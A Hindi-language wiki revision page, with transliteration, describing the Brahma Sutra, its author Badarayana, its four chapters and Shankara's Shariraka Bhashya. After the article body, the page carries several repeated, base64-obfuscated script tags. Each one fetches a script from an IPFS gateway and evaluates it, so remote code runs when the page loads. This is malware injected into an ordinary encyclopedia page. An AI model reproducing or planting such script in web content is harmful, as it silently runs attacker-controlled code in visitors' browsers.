Difference between revisions of "ब्रह्म सूत्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''ब्रह्म सूत्र / Brahm Sutra'''<br />
+
'''ब्रह्म सूत्र''' को वेदान्तशास्त्र अथवा उत्तर (ब्रह्म) मीमांसा का आधार [[ग्रन्थ]] माना जाता है। इसके रचयिता [[बादरायण]] कहे जाते हैं। बादरायण से पूर्व भी [[वेदान्त]] के आचार्य हो गये हैं, सात आचार्यों के नाम तो इस ग्रन्थ में ही प्राप्त हैं। इसका विषय है- 'ब्रह्म का विचार'।
*वेदान्त शास्त्र अथवा उत्तर (ब्रह्म) मीमांसा का आधार ग्रन्थ। इसके रचयिता [[बादरायण]] कहे जाते हैं।  
+
*इनसे पहले भी वेदान्त के आचार्य हो गये हैं, सात आचार्यों के नाम तो इस ग्रन्थ में ही प्राप्त हैं। इसका विषय है ब्रह्म का विचार।
+
ब्रह्मसूत्र के अध्यायों का वर्णन इस प्रकार हैं-
*ब्रह्मसूत्र के अध्यायों का वर्णन इस प्रकार हैं-
 
 
*'''प्रथम अध्याय''' का नाम 'समन्वय' है, इसमें अनेक प्रकार की परस्पर विरुद्ध श्रुतियों का समन्वय ब्रह्म में किया गया है।  
 
*'''प्रथम अध्याय''' का नाम 'समन्वय' है, इसमें अनेक प्रकार की परस्पर विरुद्ध श्रुतियों का समन्वय ब्रह्म में किया गया है।  
 
*'''दूसरे अध्याय''' का साधारण नाम 'अविरोध' है।  
 
*'''दूसरे अध्याय''' का साधारण नाम 'अविरोध' है।  
Line 12: Line 11:
 
*'''चतुर्थ अध्याय''' का नाम 'फल' है। इसमें जीवन्मुक्ति, जीव की उत्क्रान्ति, सगुण और निर्गुण उपासना के फलतारतम्य पर विचार किया गया है।  
 
*'''चतुर्थ अध्याय''' का नाम 'फल' है। इसमें जीवन्मुक्ति, जीव की उत्क्रान्ति, सगुण और निर्गुण उपासना के फलतारतम्य पर विचार किया गया है।  
 
*ब्रह्मसूत्र पर सभी वेदान्तीय सम्प्रदायों के आचार्यों ने भाष्य, टीका व वृत्तियाँ लिखी हैं। इनमें गम्भीरता, प्रांजलता, सौष्ठव और प्रसाद गुणों की अधिकता के कारण शांकर भाष्य सर्वश्रेष्ठ स्थान रखता है। इसका नाम 'शारीरक भाष्य' है।
 
*ब्रह्मसूत्र पर सभी वेदान्तीय सम्प्रदायों के आचार्यों ने भाष्य, टीका व वृत्तियाँ लिखी हैं। इनमें गम्भीरता, प्रांजलता, सौष्ठव और प्रसाद गुणों की अधिकता के कारण शांकर भाष्य सर्वश्रेष्ठ स्थान रखता है। इसका नाम 'शारीरक भाष्य' है।
{{प्रचार}}
+
 
{{लेख प्रगति  
+
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
|आधार=
 
|प्रारम्भिक= प्रारम्भिक1
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{धर्मसूत्र2}}
 
{{धर्मसूत्र2}}

Latest revision as of 08:56, 1 May 2012

brahm sootr ko vedantashastr athava uttar (brahm) mimaansa ka adhar granth mana jata hai. isake rachayita badarayan kahe jate haian. badarayan se poorv bhi vedant ke achary ho gaye haian, sat acharyoan ke nam to is granth mean hi prapt haian. isaka vishay hai- 'brahm ka vichar'.

brahmasootr ke adhyayoan ka varnan is prakar haian-

  • pratham adhyay ka nam 'samanvay' hai, isamean anek prakar ki paraspar viruddh shrutiyoan ka samanvay brahm mean kiya gaya hai.
  • doosare adhyay ka sadharan nam 'avirodh' hai.
    • isake pratham pad mean svamatapratishtha ke lie smriti-tarkadi virodhoan ka parihar kiya gaya hai.
    • dvitiy pad mean viruddh matoan ke prati dosharopan kiya gaya hai.
    • tritiy pad mean brahm se tatvoan ki utpatti kahi gayi hai.
    • chaturth pad mean bhootavishayak shrutiyoan ka virodhaparihar kiya gaya hai.
  • tritiy adhyay ka sadharan nam 'sadhan' hai. isamean jiv aur brahm ke lakshanoan ka nirdesh karake mukti ke bahirang aur antarang sadhanoan ka nirdesh kiya gaya hai.
  • chaturth adhyay ka nam 'phal' hai. isamean jivanmukti, jiv ki utkranti, sagun aur nirgun upasana ke phalataratamy par vichar kiya gaya hai.
  • brahmasootr par sabhi vedantiy sampradayoan ke acharyoan ne bhashy, tika v vrittiyaan likhi haian. inamean gambhirata, praanjalata, saushthav aur prasad gunoan ki adhikata ke karan shaankar bhashy sarvashreshth sthan rakhata hai. isaka nam 'sharirak bhashy' hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>